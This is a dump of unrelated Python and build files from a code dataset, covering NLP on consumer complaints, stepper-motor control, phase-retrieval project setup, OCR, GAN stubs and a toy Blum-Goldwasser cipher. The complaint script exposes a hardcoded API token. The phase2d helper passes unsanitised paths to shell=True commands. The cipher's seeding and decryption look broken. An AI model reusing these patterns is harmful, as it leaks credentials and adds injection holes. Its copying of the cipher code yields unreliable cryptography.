|\n| 3. One Time Pad |\n| 0. Exit |\n======================================\n ''')\n\n method = input('Please select a encryption method: ')\n return method\n\nif __name__ == '__main__':\n main()","sub_path":"cryptography.py","file_name":"cryptography.py","file_ext":"py","file_size_in_byte":2937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"559499243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nApplication name: UMKC_research\nDescription: Natural language processing of CFPB complaints\nAuthor: Adrienne Anderson\nDate: 2017-10-01\n\"\"\"\n\n#%% SET-UP\n\n# Use environment simple_nlp\n\nimport pandas as pd\nimport numpy as np\nfrom sodapy import Socrata\nfrom nltk import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS as stop \nimport re\n\nimport os\nentry_point = r'/home/adrienne/Code/PythonProjects/CFPB/src'\nos.chdir(entry_point)\n\n#%% GET COMPLAINT DATA\n\nAPP_TOKEN = 'Jhf65sZJl8oqUNCpFZ0PubeOa'\n\nfields_to_keep = [\n 'date_received',\n 'product',\n 'sub_product',\n 'issue',\n 'sub_issue',\n 'complaint_what_happened',\n 'company',\n 'state',\n 'zip_code',\n 'complaint_id'\n ]\n\n \nclient = Socrata('data.consumerfinance.gov', APP_TOKEN)\n\nresults = client.get('jhzv-w97w', where='complaint_what_happened is not null', limit=2000)\nresults_df = pd.DataFrame.from_records(results)\ndf = results_df[fields_to_keep]\n\nclient.close()\n \n#%% SPACY SET-UP\n \nimport spacy\nimport en_core_web_sm\nnlp = en_core_web_sm.load()\n\n# spacy.en.language_data.STOP_WORDS - how to access?\n\n#%% SPACY NER\n\ndef NER(doc):\n processed_doc = nlp(doc)\n ents = [str(ent) for ent in processed_doc.ents if ent.label_ == 'ORG']\n ents = [e.replace('X','').lower() for e in ents]\n ent_list = [word_tokenize(e) for e in ents]\n ent_tokens = [re.sub(r'[^a-z]+', '', t) for l in ent_list for t in l]\n ent_tokens = [t for t in ent_tokens if t not in stop and len(t) > 2]\n return ent_tokens\n \ndf['ent_tokens'] = df.complaint_what_happened.apply(lambda text: NER(text))\n\n# Possible action plan:\n# Find relevant entities in each complaint using NER function\n# Find noun phrases in each complaint using find_np function\n# Convert to embedding vector\n# Train SVM using noun phrase embeddings as input and company as target\n# A row may have more than one inputs (treat each noun phrase as a separate sample)\n\n#%% SPACY NOUN CHUNKS\n\ndoc = df['complaint_what_happened'].iloc[0]\n\n# Need more preprocessing (what's the best order to do these in?):\n# * Replace 'X' with empty string - DONE\n# * Convert to lowercase - DONE\n# * Remove punctuation\n# * Remove tokens with only digits\n# * Stem\n# Do all steps before noun chunking? Or save some until afterwards?\n\n# What if I use NOUNS instead of NOUN CHUNKS? Does that perform better or worse?\n \ndef find_nc(doc):\n tokens = []\n doc = doc.replace('X','').lower()\n for nc in nlp(doc).noun_chunks:\n if len(nc) > 1 and not all(token.is_stop for token in nc):\n tokens += [w for w in word_tokenize(nc.text) if w not in stop]\n tokens = [t for t in [re.sub(r'[^a-z]+', '', t) for t in tokens] if len(t)>2]\n tokens = [WordNetLemmatizer().lemmatize(t) for t in tokens]\n return tokens\n\ndf['nc'] = df['complaint_what_happened'].apply(lambda doc: find_nc(doc))\n\n#%% VECTORIZE THE TOKENS DERIVED FROM NOUN CHUNKS USING ARORA METHOD - SKIP THIS FOR NOW\n\nfrom sentence2vec import *\n\ndef create_docvec(tokens):\n words = [Word(t, nlp(t).vector) for t in tokens]\n docvec = Sentence(words)\n return docvec\n\ndocvec_input = df['nc'].apply(lambda tokens: create_docvec(tokens))\n\nembedding_size = 300\n\n# training\ndf['docvec'] = sentence_to_vec(docvec_input.tolist(), embedding_size)\n# Not working...\n# \"ValueError: Input contains NaN, infinity or a value too large for dtype('float64').\"\n\n#%% VECTORIZE NOUN CHUNK TOKENS USING GENSIM DOC2VEC\n\n#import gensim\nfrom gensim.models import doc2vec\nimport time\n\ndef nltk_tokenize(text):\n text = text.lower()\n tokens = word_tokenize(text)\n return tokens\n\ndf['features'] = df.apply(lambda row: list(row['nc']) + list(row['ent_tokens']), axis=1)\n\n#input_column = df['complaint_what_happened'].apply(lambda d: nltk_tokenize(d))\n#input_column = df['nc']\ninput_column = df['features']\n\ndocs = [doc2vec.TaggedDocument(\n words=d, tags=[label]) for d, label in zip(\n input_column, df['complaint_id'])]\n \nmodel = doc2vec.Doc2Vec(docs, size = 100, window = 8, min_count = 10, workers = 4)\n\n# Find similar documents\nnew_doc = df['nc'][2]\nnew_vector = model.infer_vector(new_doc)\nsims = model.docvecs.most_similar([new_vector])\n\n#%% K-MEANS CLUSTERING OF DOCUMENT VECTORS - SKIP NOW\n\nfrom sklearn.cluster import KMeans\nfrom sklearn import preprocessing\n\nn_clusters = 409\nX = np.array(model.docvecs)\nX_norm = preprocessing.normalize(X, norm='l2')\nkm = KMeans(n_clusters=n_clusters).fit(X_norm)\n\nl = km.labels_\ndf['km_labels'] = l\n\ng = df.groupby('km_labels')\n\nfor name,group in g:\n print(group[['company','product']])\n print()\n\n#%% CLASSIFICATION WITH SVM - PRODUCTS\n \n# In 2000-row sample, 409 unique companies and 17 unique products\n \nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVC\n\n# Define data and targets\nX = np.array(model.docvecs)\nX_norm = preprocessing.normalize(X, norm='l2')\ny = np.array(df['product'])\nX_train, X_test, y_train, y_test = train_test_split(X_norm, y, test_size=0.3, random_state=0)\n\n# Train\nclf = SVC()\nclf.fit(X_train, y_train) \n\nclf.score(X_test, y_test)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/CFPB_main.py","file_name":"CFPB_main.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"56722089","text":"\"\"\" Imports \"\"\"\nimport logging\nimport threading\nimport time\nimport RPi.GPIO as GPIO\n\n\nclass Turn(object):\n \"\"\" Turn class \"\"\"\n STEP_PINS_RIGHT = [19, 20, 21, 26]\n STEP_PINS_LEFT = [17, 22, 23, 24]\n\n def __init__(self):\n logging.basicConfig(\n format='[%(levelname)s] (%(threadName)-10s) %(message)s',)\n\n self.direction = 1 # forward\n self.drive_time = 1 # seconds\n self.wait_time = 1 / float(1000) # speedunit\n\n def worker(self, pins, waittime, move_dir):\n \"\"\" The worker \"\"\"\n # Use BCM GPIO references\n # instead of physical pin numbers\n GPIO.setmode(GPIO.BCM)\n\n # Define advanced sequence\n # as shown in manufacturers datasheet\n seq = [[1, 0, 0, 1],\n [1, 0, 0, 0],\n [1, 1, 0, 0],\n [0, 1, 0, 0],\n [0, 1, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 1]]\n\n step_count = len(seq)\n logging.info('Starting thread')\n cur_thr = threading.currentThread()\n\n # Set all pins as output\n for pin in pins:\n logging.debug('Setup pins')\n GPIO.setup(pin, GPIO.OUT)\n GPIO.output(pin, False)\n counter = 0\n while getattr(cur_thr, \"do_run\", True):\n\n logging.debug(counter)\n logging.debug(seq[counter])\n\n for pin in range(0, 4):\n xpin = pins[pin] # Get GPIO\n if seq[counter][pin] != 0:\n logging.debug('Enable GPIO %i', xpin)\n GPIO.output(xpin, True)\n else:\n GPIO.output(xpin, False)\n\n counter += move_dir\n\n # If we reach the end of the sequence\n # start again\n if counter >= step_count:\n counter = 0\n if counter < 0:\n counter = step_count + move_dir\n\n # Wait before moving on\n time.sleep(waittime)\n\n def run(self):\n \"\"\"The run method\"\"\"\n right_thread = threading.Thread(\n name='right_wheel',\n target=self.worker,\n args=(self.STEP_PINS_RIGHT, self.wait_time, self.direction,))\n left_thread = threading.Thread(\n name='left_wheel',\n target=self.worker,\n args=(self.STEP_PINS_LEFT, self.wait_time, self.direction,))\n\n # Start main loop\n try:\n right_thread.start()\n left_thread.start()\n # laat x seconden rijden\n time.sleep(self.drive_time)\n # threads opruimen\n right_thread.do_run = False\n right_thread.join()\n left_thread.do_run = False\n left_thread.join()\n # GPIO netjes afsluiten\n GPIO.cleanup()\n\n except (KeyboardInterrupt, SystemExit):\n # GPIO netjes afsluiten\n GPIO.cleanup()\n\n def left(self, sec):\n \"\"\"Move left\"\"\"\n self.direction = 1\n self.drive_time = sec\n self.run()\n\n def right(self, sec):\n \"\"\"Move right\"\"\"\n self.direction = -1\n self.drive_time = sec\n self.run()\n","sub_path":"autobot/turn.py","file_name":"turn.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"313325720","text":"_workpath = None\n\ndef use_project(project_path):\n\tglobal _workpath\n\tif type(project_path)!=str or project_path==\"help\":\n\t\tprint(\"This function is used to switch to a existing project\")\n\t\tprint(\" -> Input: project_path ( str, the project directory you want to switch to)\")\n\t\treturn\n\timport os\n\timport sys\n\ttemp = None\n\tif project_path[0] == '/' or project_path[0:2] == '~/':\n\t\ttemp = os.path.abspath(project_path)\n\t\tif os.path.exists(temp):\n\t\t\t_workpath = temp\n\t\telse:\n\t\t\traise ValueError(\"The project \" + temp + \" doesn't exists. Exit\")\n\telse:\n\t\tnowfolder = os.path.abspath(sys.path[0])\n\t\ttemp = os.path.join(nowfolder, project_path)\n\t\tif os.path.exists(temp):\n\t\t\t_workpath = os.path.abspath(temp)\n\t\telse:\n\t\t\traise ValueError(\"The project \" + temp + \" doesn't exists. Exit\")\n\ndef new_project(data_mask_path, path=None, name=None):\n\tglobal _workpath\n\timport sys\n\timport os\n\tif type(data_mask_path)!=list or data_mask_path == \"help\":\n\t\tprint(\"This function is used to create a new project directory at your given path\")\n\t\tprint(\" -> Input: data_mask_path (list, [data_path, user_mask_path])\")\n\t\tprint(\" *option: path (create work directory at your give path, default as current dir)\")\n\t\tprint(\" *option: name (give a name to your project, default is an number)\")\n\t\tprint(\"[Notice] Your original intensity file should be 3D matrix '.npy' or '.mat' or '.bin', mask file must be 'npy'\")\n\t\tprint(\" Leave data_mask_path[1] to None if you don't have user mask\")\n\t\tprint(\"[Notice] 'path' must be absolute path !\")\n\t\treturn\n\tdata_path = data_mask_path\n\timport subprocess\n\timport numpy as np\n\tcode_path = __file__.split('/phase2d.py')[0]\n\tif not os.path.exists(data_path[0]):\n\t\traise ValueError(\"\\nYour data path is incorrect. Try ABSOLUTE PATH. Exit\\n\")\n\tif data_path[1] is not None and not os.path.exists(data_path[1]):\n\t\traise ValueError(\"\\nYour mask path is incorrect. Try ABSOLUTE PATH. Exit\\n\")\n\tif path == None or path == \"./\":\n\t\tpath = os.path.abspath(sys.path[0])\n\telse:\n\t\tif not os.path.exists(path):\n\t\t\traise ValueError('\\n Your path is incorrect. Try ABSOLUTE PATH. Exit\\n')\n\t\telse:\n\t\t\tpath = os.path.abspath(path)\n\tif name is not None:\n\t\t_workpath = os.path.join(path, name)\n\telse:\n\t\tall_dirs = os.listdir(path)\n\t\tnid = 0\n\t\tfor di in all_dirs:\n\t\t\tif di[0:8] == \"phase2d_\" and str.isdigit(di[8:]):\n\t\t\t\tnid = max(nid, int(di[8:]))\n\t\tnid += 1\n\t\t_workpath = os.path.join(path, 'phase2d_' + format(nid, '02d'))\n\tcmd = code_path + '/template_2d/new_project ' + _workpath\n\tsubprocess.call(cmd, shell=True)\n\t# now load data\n\tif data_path[0].split('.')[-1] == 'npy':\n\t\tdata = np.load(data_path[0])\n\t\tdata.tofile(_workpath+'/ori_intens/pattern.bin')\n\telif data_path[0].split('.')[-1] == 'bin':\n\t\tcmd = 'cp ' + data_path[0] + ' ' + _workpath + '/ori_intens/pattern.bin'\n\t\tsubprocess.call(cmd, shell=True)\n\telif data_path[0].split('.')[-1] == 'mat':\n\t\timport scipy.io as sio\n\t\tdfile = sio.loadmat(data_path[0])\n\t\tdata = dfile.values()[0]\n\t\tdata.tofile(_workpath+'/ori_intens/pattern.bin')\n\telse:\n\t\traise ValueError('\\n Error while loading your data ! Exit\\n')\n\tcmd = 'ln -fs ' + _workpath + '/ori_intens/pattern.bin ' + _workpath + '/data.bin'\n\tsubprocess.call(cmd, shell=True)\n\t# now load mask data\n\tif data_path[1] is not None:\n\t\tcmd = 'cp ' + data_path[1] + ' ' + _workpath + '/ori_intens/mask.npy'\n\t\tsubprocess.call(cmd, shell=True)\n\t\tcmd = 'ln -fs ' + _workpath + '/ori_intens/mask.npy ' + _workpath + '/mask.npy'\n\t\tsubprocess.call(cmd, shell=True)\n\t# now change output|path in config.ini\n\timport ConfigParser\n\tconfig = ConfigParser.ConfigParser()\n\tconfig.read(os.path.join(_workpath, 'config.ini'))\n\tconfig.set('output', 'path', _workpath)\n\tconfig.set('input', 'fnam', os.path.join(_workpath,'data.bin'))\n\tif data_path[1] is not None:\n\t\tconfig.set('input', 'user_mask', os.path.join(_workpath,'mask.npy'))\n\telse:\n\t\tconfig.set('input', 'user_mask', 'None')\n\twith open(os.path.join(_workpath, 'config.ini'), 'w') as f:\n\t\tconfig.write(f)\n\t# done\n\tprint(\"\\nAll work done ! \")\n\tprint(\"Now please confirm running parameters. Your can re-edit it by calling function phase2d.config(...) or eidt config.ini directly.\\n\")\n\ndef config(params):\n\tglobal _workpath\n\tif params == {} or type(params)!=dict:\n\t\tprint(\"This function is used to edit configure file\")\n\t\tprint(\" -> Input (dict, parameters yout want to modified.)\")\n\t\tprint(\"params format : \")\n\t\tprint(\" {\\n\\\n\t\t\t\t\t'input|shape' : '120, 120', \\n\\\n\t\t\t\t\t'input|padd_to_pow2' : 'True', \\n\\\n\t\t\t\t\t... \\n\\\n\t\t\t\t\t}\")\n\t\tprint(\"You can look into 'config.ini' for detail information\")\n\t\treturn\n\timport os\n\tif not os.path.exists(os.path.join(_workpath,'config.ini')):\n\t\traise ValueError(\"I can't find your configure file, please run phase2d.new_project(...) first !\")\n\timport ConfigParser\n\tconfig = ConfigParser.ConfigParser()\n\tconfig.read(os.path.join(_workpath,'config.ini'))\n\tfor k in params.keys():\n\t\tsection, par = k.split(\"|\")\n\t\tconfig.set(section, par, params[k])\n\twith open(os.path.join(_workpath,'config.ini'), 'w') as f:\n\t\tconfig.write(f)\n\tprint('\\n Configure finished.')\n\ndef run(nohup=False):\n\tglobal _workpath\n\tif type(nohup)!=bool:\n\t\tprint(\"Call this function to start phasing\")\n\t\tprint(\" -> Input: num_proc (int, how many processes to run in parallel, default=1)\")\n\t\tprint(\" nohup (bool, whether run it in the background, default=False)\")\n\t\treturn\n\timport os\n\timport subprocess\n\tif not os.path.exists(os.path.join(_workpath,'config.ini')):\n\t\traise ValueError(\"Please call phase2d.new_project(...) and phase2d.config(...) first ! Exit\")\n\timport sys\n\tcode_path = __file__.split('/phase2d.py')[0] + '/template_2d'\n\tif nohup == True:\n\t\tcmd = \"python \" + os.path.join(code_path,'make_input.py') + ' '+ os.path.join(_workpath,'config.ini') + ' >' + os.path.join(_workpath,'make_input.log')\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path,'make_input.py') + ' '+ os.path.join(_workpath,'config.ini')\n\tsubprocess.check_call(cmd, shell=True)\n\tif nohup == True:\n\t\tcmd = \"python \" + os.path.join(code_path, 'phase.py') + ' ' + os.path.join(_workpath, 'input.h5') + ' &>' + os.path.join(_workpath, 'phase.log') + '&'\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path, 'phase.py') + ' ' + os.path.join(_workpath, 'input.h5')\n\tsubprocess.check_call(cmd, shell=True)\n\ndef show_result(outpath=None, exp_param=None):\n\tglobal _workpath\n\tif type(outpath)==str and outpath == \"help\":\n\t\tprint(\"This function is used to plot phasing results in a figure\")\n\t\tprint(\" -> Input: \")\n\t\tprint(\" *option: outpath (IF you move output.h5 to another folder, please give me its path)\")\n\t\tprint(\" *option: exp_param (list detd, lambda, det_r, pix_size in a string. Used to calculate q value.\")\n\t\tprint(\" e.g. '200,2.5,128,0.3'. If you don't need q info, leave it as default (None))\")\n\t\treturn\n\tif outpath is not None and type(outpath)!=str:\n\t\traise ValueError(\"Input 'outpath should be a string. Exit'\")\n\timport sys\n\timport os\n\timport subprocess\n\tcode_path = __file__.split('/phase2d.py')[0] + '/template_2d'\n\n\tif outpath is None:\n\t\tcmd = \"python \" + os.path.join(code_path, 'show_result.py') + ' ' + os.path.join(_workpath, 'output.h5')\n\telse:\n\t\tcmd = \"python \" + os.path.join(code_path, 'show_result.py') + ' ' + outpath\n\tif exp_param is not None:\n\t\tcmd = cmd + ' ' + str(exp_param)\n\n\tsubprocess.check_call(cmd, shell=True)\n","sub_path":"phase/phase2d.py","file_name":"phase2d.py","file_ext":"py","file_size_in_byte":7314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"447845290","text":"###############################################################################\n# Unpublished Work Copyright (c) 2011-2012\n# Trading Technologies International, Inc.\n# All Rights Reserved Worldwide\n#\n# * * * S T R I C T L Y P R O P R I E T A R Y * * *\n#\n# WARNING: This program (or document) is unpublished, proprietary property\n# of Trading Technologies International, Inc. and is to be maintained in\n# strict confidence. Unauthorized reproduction, distribution or disclosure\n# of this program (or document), or any program (or document) derived from\n# it is prohibited by State and Federal law, and by local law outside of\n# the U.S.\n###############################################################################\n# Author: John Shaw (jshaw)\n###############################################################################\n# vim:ft=python\nImport('env')\nImport('target')\n\nlibs = [\n 'tsdb',\n 'boost_date_time',\n 'protobuf',\n 'logging',\n 'tcmalloc',\n 'profiler',\n 'zmq',\n]\n\ncpppath = [\n \"#/include\",\n \"#/../logging/include\",\n \"#/../thirdparty/boost/include\",\n \"#/../util/include\",\n]\n\nlibpath = [\n \"#/{0}\".format(target),\n \"#/../logging/lib\",\n \"#/../thirdparty/boost/lib\",\n \"#/../thirdparty/zeromq/lib\",\n]\n\nenv = env.Clone(CPPPATH=cpppath, LIBPATH=libpath)\nenv.Append(LIBS=libs)\n\nenv.Program(\"dbtest\", \"test.cpp\")\nenv.Program(\"dbbench\", \"bench.cpp\")\n","sub_path":"dashboard/services/tsdb/debug/dbtest/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445265997","text":"# General settings\n\n#### REQUIRED ####\n\n'''\nPath to the csv file with information about the samples to run.\nSee an example in './inputs/experiment_info.csv', and descriptions\nof columns are in the README. \nPaths can be either relative or absolute, but cannot contain spaces. \n'''\ninfo_file = \"./JTG-E86_input.csv\"\n\n'''\nPath to a folder containing the read files. Can be relative or absolute. \nRead files can be either zipped (.fastq.gz) or unzipped (.fastq)\nEither the containing folder or the filename must begin with\nthe sample identifier. \nEx. When processing sample 'A234', the pipeline will find the following: \n- 'read_files_dir/A234_L001-ds.aaa/other_filename.fastq.gz'\n- 'read_files_dir/A234_L001_R1_001.fastq'\n- 'read_files_dir/other_foldername/A234_L001_R1_001.fastq.gz'\n'''\nread_files_dir = '../ngs_run_220711/'\n\n\n#### DEBUGGING SETTINGS ####\n\n'''\nIntermediate files are created at different steps of processing. \nSetting this to false will keep these files for debugging or looking\ndeeper at some filtered reads. \nNormally, these files are deleted to save space. \n'''\ndelete_intermediates = True\n\n\n#### SENSITIVITY AND SYSTEM SETTINGS ####\n\n'''\nThe Qscore_threshold to use. This must be defined. \nUse -1 to not filter any reads. \nReads with <50% bases passing threshold are filtered. \n'''\nQscore_threshold = 20\n\n# The length of the sequence to match to the target files\ntransposon_end_flanking_sequence_length = 17\n\n# The number of bases duplicated by transposon insertion\ntarget_site_duplication_length = 5\n\n\n#### GRAPHING SETTINGS ####\n\n# General matplotlib settings\nplots_filetype = 'svg'\nplots_dpi = 600\nfig_size_inches = [8.9, 3.1]\n\n# Bin size for genome-wide plots, in base pairs\ngenome_bin_size = 5000\n\n# Percent of reads at which to cap the y-axis on the zoomed in histogram\n# to show low-level reads\nlow_reads_cap_percent = 0.50\n\n# On-target calculated window in the transposition distance histogram\non_target_window = 200\n","sub_path":"parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"361764156","text":"import torch\nimport torch.nn as nn\n\nclass Encoder(nn.Module):\n\n def __init__(self):\n super(Encoder, self).__init__()\n\n self.layer1 = nn.Sequential(\n nn.Linear(1000, 500),\n nn.LeakyReLU()\n )\n\n self.layer2 = nn.Sequential(\n nn.Linear(500, 200),\n nn.LeakyReLU()\n )\n\n self.layer3 = nn.Sequential(\n nn.Linear(200, 100),\n nn.LeakyReLU()\n )\n\n # self.layer1 = nn.Sequential(\n # nn.Conv1d(1, 16, 21, 1, 0),\n # nn.BatchNorm1d(16),\n # nn.LeakyReLU()\n # )\n #\n # self.max_pool = nn.MaxPool1d(2)\n #\n # self.layer2 = nn.Sequential(\n # nn.Conv1d(16, 32, 11, 1, 0),\n # nn.BatchNorm1d(32),\n # nn.LeakyReLU()\n # )\n #\n # self.layer3 = nn.Sequential(\n # nn.Conv1d(32, 64, 21, 1, 0),\n # nn.BatchNorm1d(64),\n # nn.LeakyReLU()\n # )\n #\n # self.\n\n\n # self.fc1 =\n\n def forward(self, input):\n #input :: 1000 x 1\n x = self.layer1(input)\n # print('... 1', x.size())\n # x = self.max_pool(x)\n # print('.. max pool .. ', x.size())\n x = self.layer2(x)\n # print('... 2', x.size())\n x = self.layer3(x)\n # x = self.max_pool(x)\n # print('... 3', x.size())\n return x\n\n\n\nclass Generator(nn.Module):\n\n def __init__(self, singer):\n super(Generator, self).__init__()\n self.singer = singer\n\n self.layer1 = nn.Sequential(\n nn.Linear(100, 200),\n nn.LeakyReLU()\n )\n\n self.layer2 = nn.Sequential(\n nn.Linear(200, 500),\n nn.LeakyReLU()\n )\n\n self.layer3 = nn.Sequential(\n nn.Linear(500, 1000),\n )\n\n self.bn = nn.BatchNorm1d(1)\n\n def forward(self, input):\n # x = self.bn(input.unsqueeze(1))\n # x = x.squeeze(1)\n x = self.layer1(input)\n x = self.layer2(x)\n x = self.layer3(x)\n x = nn.Tanh()(x)\n return x\n\n\nclass Discriminator():\n def __init__(self, singer):\n pass\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492058555","text":"from paddleocr import PaddleOCR\nfrom tools.infer.utility import draw_ocr\nfrom PIL import Image\n\ndef one_pred(img_path):\n ocr = PaddleOCR(use_angle_cls=True, lang=\"ch\")\n result = ocr.ocr(img_path, cls=True)\n image = Image.open(img_path).convert('RGB')\n boxes = [line[0] for line in result]\n txts = [line[1][0] for line in result]\n scores = [line[1][1] for line in result]\n im_show = draw_ocr(image, boxes, txts, scores, font_path='/doc/simfang.ttf')\n im_show = Image.fromarray(im_show)\n\n n = 0\n stR=\"\"\n for line in result:\n #print(line[1])\n n += 1\n texts = line[1][0]\n stR = stR + \",\" + str(texts)\n #print(texts)\n print(stR)\n im_show.show()\n return stR\n#\n# path1 = r'img\\10.png'\n# path2 = r'img\\11.png'\n# text = one_pred(path1)\n\n\n","sub_path":"fnayi.py","file_name":"fnayi.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"454793972","text":"from turtle import *\n\ndef draw_star(x, y, length):\n penup()\n goto(x, y)\n pendown()\n left(36)\n for _ in range(5):\n forward(length)\n left(144)\n\nspeed(-1)\nfor i in range(100):\n import random\n colors = ['blue', 'red', 'pink', 'orange', 'yellow', 'violet']\n color(random.choice(colors))\n x = random.randint(-300, 300) #random from -300 to 300\n y = random.randint(-300, 300)\n length = random.randint(3, 10)\n draw_star(x, y, length)\n\nmainloop()\n","sub_path":"lab3/homework/ex5_6.py","file_name":"ex5_6.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448983508","text":"# Model a 2-alternative forced choice task.\n# Expectation: 80% of participants will succeed.\n# Analysis: a one-tailed binomial test.\n\n# This file contains three sections:\n# quick version shows the most efficient way to implement the experiment.\n# argument version shows how to use arguments to tweak the parameters.\n# detailed version shows a very inefficient way to implement the\n# experiment, but it gives more insight into how Bunny works.\n\nfrom Bunny import *\n\n#################\n# QUICK VERSION #\n#################\n\n# Create a binomial agent with probability of success = 0.8\nBehavior = Participant(Behaviors.BernoulliAgent(0.8))\n# Create a DataTest that runs a binomial test\nTest = DataTest(Tests.BinomialTest(\"OT\"))\n# Create an experiment object\nMyExperiment = Experiment(Behavior, Test, \"2-AFC task\")\n# Explore relation between sample size and power\nExplore(MyExperiment)\n# Find a sample size given your power\nMyExperiment.SetPower(0.95)\nHop(MyExperiment)\n# Visualize your experiment's power given a sample size\nMyExperiment.SetSampleSize(16)\nImagine(MyExperiment)\n\n####################\n# ARGUMENT VERSION #\n####################\n\n# Create a binomial agent named \"Behavior model\" with probability of success = 0.8\nBehavior = Participant(Behaviors.BernoulliAgent(0.8), \"Behavior model\")\n# Create a DataTest that runs a binomial test. However, mark the test as\n# successfull if p<0.1, and set chance behavior to 0.25.\nTest = DataTest(Tests.BinomialTest(TestType=\"TT\", alpha=0.1, Bias=0.25))\n# Create an experiment object\nMyExperiment = Experiment(Behavior, Test, \"2-AFC task\")\n# Explore relation between sample size and power. Test sample sizes\n# between 1 and 100\nExplore(MyExperiment, lower=1, limit=100)\n# Do the same as above, but save the image instead of displaying it\nExplore(MyExperiment, lower=1, limit=100, filename=\"MyResults.pdf\")\n# Find a sample size given your power\nMyExperiment.SetPower(0.95)\n# Search for my appropriate sample size with a limit up to 200 participants.\n# Ignore the experiment's power and instead use 0.85\n# Run 500 simulations for each proposed sample size\n# set Verbose to false, meaning that you will only see the final answer\n# and not the search process.\nHop(MyExperiment, limit=200, power=0.85, samples=500, Verbose=False)\n# Visualize your experiment's power given a sample size\nMyExperiment.SetSampleSize(16)\n# Visualize experiment's power using 100,000 simulations\nImagine(MyExperiment, samples=100000)\n\n####################\n# DETAILED VERSION #\n####################\n\n# Create a function that returns success with probabiliy = 0.8\nBehaviorModel = Behaviors.BernoulliAgent(0.8)\n# Option 1: Create a participant object and send the behavior model as an\n# argument\nBehavior = Participant(BehaviorModel)\n# Option 2: Create an empty participant object and add the behavior model later\nBehavior = Participant()\nBehavior.SetBehavior(BehaviorModel)\n\n# Load a function that runs a binomial test\nMyTest = Tests.BinomialTest(\"OT\")\n# Option 1: Create a datatest object and send the DataTest as an argument\nTest = DataTest(MyTest)\n# Option 2: Create an empty DataTest object and add the binomial test later\nTest = DataTest()\nTest.SetTest(MyTest)\n\n# Create an experiment object\nMyExperiment = Experiment(Behavior, Test, \"2-AFC task\")\n# See quick version section above for how examples on what you can do with\n# the experiment object.\n","sub_path":"Bunny/Examples/2AFC_task.py","file_name":"2AFC_task.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"378635337","text":"from random import randint\n\ndef egcd(a, b):\n if a == 0:\n return (b, 0, 1)\n else:\n g, y, x = egcd(b % a, a)\n return (g, x - (b // a) * y, y)\n\ndef modinv(a, m):\n g, x, y = egcd(a, m)\n if g != 1:\n raise Exception('modular inverse does not exist')\n else:\n return x % m\n\ndef decrypt(message, p, q, y):\n #rp = (p + 1 // 4)\n #rp = rp**(len(message))\n #rp = y**rp\n rp = pow(y, ((p+1)//4)**(len(message)), p)\n\n #print(rp)\n\n #rq = (q + 1 // 4)\n #rq = rq**(len(message))\n rq = pow(y, ((q+1)//4)**(len(message)), q)\n\n #print(rq)\n\n x0 = (q * modinv(q, p) * rp + p * modinv(p, q) * rq) % (p * q)\n\n\n print(x0)\n\n plaintext, y = encrypt(ciphertext, p*q)\n\n print(plaintext)\n \n\ndef encrypt(message, public_key):\n keystream = []\n x_vals = []\n ciphertext = \"\"\n\n x_vals.append(159201)\n\n r = randint(0, public_key)\n\n for i in range(0, len(message)):\n result = x_vals[i] ** 2\n result = result % public_key\n x_vals.append(result)\n\n print (x_vals)\n# print (\"len of x_vals:\", len(x_vals))\n# print (\"len of n:\", len(message))\n\n for i in range(0, len(x_vals)):\n keystream.append(x_vals[i] & 1)\n\n print (keystream)\n print (\"len of keystream: \", len(keystream))\n\n for i in range(0, len(message)):\n ciphertext += str(keystream[i] ^ int(message[i]))\n \n print (ciphertext)\n return (ciphertext, x_vals[len(x_vals)-1])\n\n\nn = 499 * 547\n\nplaintext = \"10011100000100001100\"\nprint (\"plaintext: \", plaintext)\n\nciphertext, y = encrypt(\"10011100000100001100\", n)\n\ndecrypt(ciphertext, 499, 547, y)\n","sub_path":"bg.py","file_name":"bg.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"499926954","text":"class Solution(object):\r\n def combinationSum4(self, nums, target):\r\n\r\n # recursive\r\n\r\n '''if target == 0:\r\n return 1\r\n\r\n count = 0\r\n for i in range(len(nums)):\r\n if target >= nums[i]:\r\n count += self.combinationSum4(nums,target - nums[i])\r\n\r\n return count'''\r\n\r\n # top down dp\r\n '''dp = [-1]*(target+1)\r\n dp[0] = 1\r\n\r\n def helper(nums,target):\r\n if dp[target]!= -1:\r\n return dp[target]\r\n\r\n count = 0\r\n for i in range(len(nums)):\r\n if target >= nums[i]:\r\n count += helper(nums,target-nums[i])\r\n\r\n dp[target] = count\r\n #print(dp)\r\n return count\r\n\r\n\r\n return helper(nums,target)'''\r\n\r\n # bottom up dp\r\n dp = [0]*(target+1)\r\n dp[0] = 1\r\n\r\n for tg in range(1,len(dp)):\r\n for j in range(len(nums)):\r\n if 